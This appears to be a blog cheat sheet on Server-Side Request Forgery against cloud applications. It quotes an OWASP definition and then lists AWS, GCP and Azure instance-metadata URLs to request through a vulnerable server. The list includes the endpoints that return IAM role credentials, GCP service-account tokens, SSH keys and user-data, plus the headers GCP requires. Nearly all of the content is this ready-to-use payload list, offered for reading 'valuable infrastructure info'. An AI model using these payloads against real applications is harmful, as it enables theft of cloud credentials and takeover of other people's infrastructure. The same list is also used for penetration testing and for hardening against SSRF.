SSRF cheat sheet for AWS, GCP and Azure

In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.

Source: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

green and white electric device

If a cloud app is vulnerable to SSRF you can read valuable infrastructure info, below the most useful URLs sorted by provider:

AWS

  • http://169.254.169.254/latest/user-data

  • http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

  • http://169.254.169.254/latest/meta-data/ami-id

  • http://169.254.169.254/latest/meta-data/reservation-id

  • http://169.254.169.254/latest/meta-data/hostname

  • http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

  • http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

  • http://169.254.169.254/latest/meta-data/

  • http://169.254.169.254/latest/meta-data/public-keys/

GCP

NOTE: Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”

  • http://169.254.169.254/computeMetadata/v1/

  • http://metadata.google.internal/computeMetadata/v1/

  • http://metadata/computeMetadata/v1/

  • http://metadata.google.internal/computeMetadata/v1/instance/id

  • http://metadata.google.internal/computeMetadata/v1/instance/region

  • http://metadata.google.internal/computeMetadata/v1/instance/zone

  • http://metadata.google.internal/computeMetadata/v1/project/project-id

  • http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

  • http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/

  • http://metadata.google.internal/computeMetadata/v1beta1/

Azure

  • http://169.254.169.254/metadata/v1/maintenance

Blind SSRF reference: https://github.com/assetnote/blind-ssrf-chains


Posted

in

by

Tags:

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *